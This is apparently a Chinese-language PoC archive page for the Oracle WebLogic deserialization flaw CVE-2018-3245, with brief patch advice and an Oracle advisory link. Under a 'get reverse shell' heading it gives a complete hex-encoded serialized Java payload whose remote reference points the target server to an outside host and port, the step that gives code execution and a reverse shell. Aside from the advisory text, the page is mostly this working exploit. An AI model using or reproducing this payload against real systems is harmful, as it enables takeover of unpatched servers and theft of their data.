关联漏洞
标题:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2018-3245)Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server组件10.3.6.0版本、12.1.3.0版本和12.2.1.3版本的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制组件,影响数据
Description
CVE-2018-3245
介绍
# Weblogic-CVE-2018-3245
CVE-2018-3245
## 0x00 简介
当地时间10月16日,北京时间10月17日凌晨,Oracle官方发布了10月份(第三季度)关键补丁更新CPU(Critical Patch Update),
其中修复了一个7月份(第二季度)CPU补丁中未能完全修复的(CVE-2018-2893)Weblogic远程代码执行漏洞,此次新修复的漏洞编号为CVE-2018-3245。
### 解决方案
Oracle官方已经在本次的关键补丁更新(CPU)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。
##### 注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
### Oracle官方CPU链接:
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
## 0x01 获取反弹shell
```
jas502n-poc.txt
Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078
```
文件快照
[4.0K] /data/pocs/cb147b7ea2c11b6f16b233185a036e8daa7999de
├── [151K] exp.jpg
├── [8.2K] nc-shell.png
├── [1.4K] README.md
└── [250K] send-payload.png
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。